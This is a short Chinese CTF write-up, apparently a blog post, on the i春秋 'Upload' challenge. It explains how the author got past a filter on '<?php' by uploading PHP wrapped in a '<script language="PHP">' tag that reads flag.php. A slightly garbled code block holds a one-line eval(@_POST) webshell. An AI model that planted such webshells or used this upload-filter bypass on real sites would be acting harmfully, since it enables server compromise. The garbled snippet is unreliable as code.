美文网首页
i春秋CTF Upload

i春秋CTF Upload

作者: V0W | 来源:发表于2018-09-05 22:04 被阅读0次

分析

  • 可以上传任意文件,并且上传之后可以打开文件(源码有链接/u/xx.php),想到上传一段php代码来打开flag.php页面:

    php<?php
    echo 'here_is_flag';
    'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';xxxxxxxxxx <?phpecho 'here_is_flag';'flag{47f996fc-4d6c-43e5-af3e-38022f1ba7a3}';<?phpeval(@_POST["v"]);?>
    

    但是发现<?php被过滤了,于是用php脚本标记来绕过过滤:

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); 
fclose($fh);
</script>
  • 查看源码:
echo 'here_is_flag';
'flag{###}';

相关文章

  • i春秋CTF Upload

    分析 可以上传任意文件,并且上传之后可以打开文件(源码有链接/u/xx.php),想到上传一段php代码来打开fl...

  • i春秋 ctf web

    爆破-1 全局变量$GLOBALS?hello=GLOBALS 爆破-2 命令注入?hello=);show_so...

  • i春秋CTF-YeserCMS

    分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmsea...

  • DDCTF2019 web-writeup

    又是没有进入复赛的ctf继续留下没有技术的泪水希望下次再加油吧! 1 滴~ 2 web签到题 3 Upload-I...

  • CTF中的几种git泄露

    git泄露是常见的ctf题型,来看几个例子 Hello World (i春秋 第二届春秋欢乐赛 web) 这里只说...

  • i春秋CTF WEB-爆破

    爆破1,2,3 看似是爆破,其实可以直接GLOBALS查看所有的全局变量,其实考的是文件包含,六位字符的爆破实在是...

  • i春秋CTF-WEB-Code

    分析 打开url,发现是一个读取文件的过程,一开始还以为是文件包含,其实直接读文件即可: 读了一下index.ph...

  • i春秋CTF大本营

    百度杯”CTF比赛 九月场Code 分析:1、看到链接想到文件包含,读取index.php,发现源代码解密如下: ...

  • 实验吧-忘记密码了

    忘记密码了 原题链接 http://ctf5.shiyanbar.com/10/upload/step1.php ...

  • 实验吧web-忘记密码了

    题目地址:http://ctf5.shiyanbar.com/10/upload/step1.php 进入题目可以...

网友评论

      本文标题:i春秋CTF Upload

      本文链接:https://www.haomeiwen.com/subject/umizwftx.html